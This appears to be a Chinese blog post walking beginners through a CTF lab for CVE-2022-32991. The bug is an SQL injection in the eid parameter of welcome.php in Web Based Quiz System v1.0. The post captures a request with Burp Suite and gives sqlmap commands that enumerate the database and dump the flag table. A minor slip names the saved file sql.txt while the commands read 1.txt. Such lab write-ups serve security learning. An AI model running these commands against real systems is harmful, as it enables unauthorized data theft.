春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]


提示:以下是本篇文章正文内容,下面案例可供参考

一、 靶场介绍

该CMS的welcome.php中存在SQL注入攻击。

Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。

二、 简单分析

先进入靶场,可以看到LOGIN和REGISTER,我们先注册一个账号,点击LOGIN进入CMS。
在这里插入图片描述
进入之后我们观察url,发现我们此时就在welcome.php,并且url后面跟着一个参数q

在这里插入图片描述
审计源代码可以发现welcome.php中的参数没有进行过滤,而且eid参数可控,此处存在SQL注入
在这里插入图片描述

到这里思路基本清晰,答案也呼之欲出。直接用sqlmap一把梭。
源代码下载地址

https://www.123pan.com/s/WAYKVv-6y8wh
提取码:t2Oc

先随便点击一个start
在这里插入图片描述

先用Burp Suite抓包
在这里插入图片描述

然后右键,选择Copy to fIle,保存为sql.txt
在这里插入图片描述
在终端输入以下命令:

获取数据库名
sqlmap -r 1.txt --dbs --random-agent -p eid

获取表名
sqlmap -r 1.txt -D ctf --tables --random-agent -p eid

获取列名
sqlmap -r 1.txt -D ctf -T flag --columns --random-agent -p eid

获取flag
sqlmap -r 1.txt -D ctf -T flag -C flag --dump --random-agent -p eid

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值